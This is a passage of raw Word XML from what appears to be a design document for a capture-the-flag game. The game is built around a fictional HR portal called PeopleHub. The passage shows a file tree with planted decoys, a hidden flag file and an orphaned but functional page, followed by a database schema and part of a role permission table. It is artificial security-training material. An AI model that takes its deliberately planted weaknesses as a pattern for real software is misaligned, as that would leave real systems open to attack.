        <w:t xml:space="preserve">  hr/directory-sync.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  config/import-settings.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  reports/legacy-report.txt      (decoy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  archive/migration-history.txt  (contains BLACKOUT-7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>public/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  index.html, map.html, exhibit-*.html, gate-*.html, stage2.html, epilogue.html, hr-portal.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  outer game pages (hr-portal.html now orphaned -- no longer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  linked from exhibit-c.html, but left intact and functional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  ctf-admin.html                 dev-only reset/inspection panel (loopback-gated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  peoplehub/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    shared/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      api.js                     fetch wrapper (401 -&gt; redirect to login, except where suppressed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      shell.js                   builds sidebar + header from data; every page calls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  PeopleHubShell.init({active, title})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      shell.css                  design system (CSS variables match the brief's color spec)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      table.js                   generic paginated/sortable/filterable data table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    login.html/js, dashboard.html/js, employees.html/js, employee-profile.html/js,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    organization.html/js, people-analytics.html/js, leave.html/js, payroll.html/js,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    documents.html/js, hr-requests.html/js, it-requests.html/js, reports.html/js,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    recruitment.html/js, training.html/js, announcements.html/js, policies.html/js,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    benefits.html, performance.html/js, administration.html/js, import.html/js,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    emergency-access.html/js, settings.html, help.html/js, profile.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  23 pages total, one HTML+JS pair each (except the two purely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  static ones), sharing shared/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Database schema (relationships)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>departments --+-- employees &gt;---- manager_id (self-referential)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; employee_profiles (1:1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; payroll (1:1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; leave_records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; performance_reviews (also reviewer_id -&gt; employees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; documents (owner, nullable) --&lt; document_access &gt;-- roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; hr_requests / it_tickets (also assigned_to -&gt; employees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; training_enrollments &gt;-- training_courses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; notifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; security_events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; emergency_access_requests (requested_by + 3 approver FKs, all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |     -&gt; employees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        \--&lt; interviews (interviewer_id -&gt; employees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             \--&lt; job_openings --&lt; applications &gt;-- candidates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        \--&lt; interviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>users --&gt; roles (role_id), employees (employee_id, nullable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>audit_logs --&gt; users (user_id, nullable -- system actions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>reports --&lt; report_results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>import_jobs                       (no FK -- standalone log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>challenge_state                   (session_key = outer game's session token, not an FK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Role capability matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/peoplehub/rbac.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the authoritative version (this is what every route handler actually checks — never the frontend nav, which just hides links a role can’t use).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>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1368"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>anyProf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>payroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hrAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>itAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>recruit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>emerg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee</w:t>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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
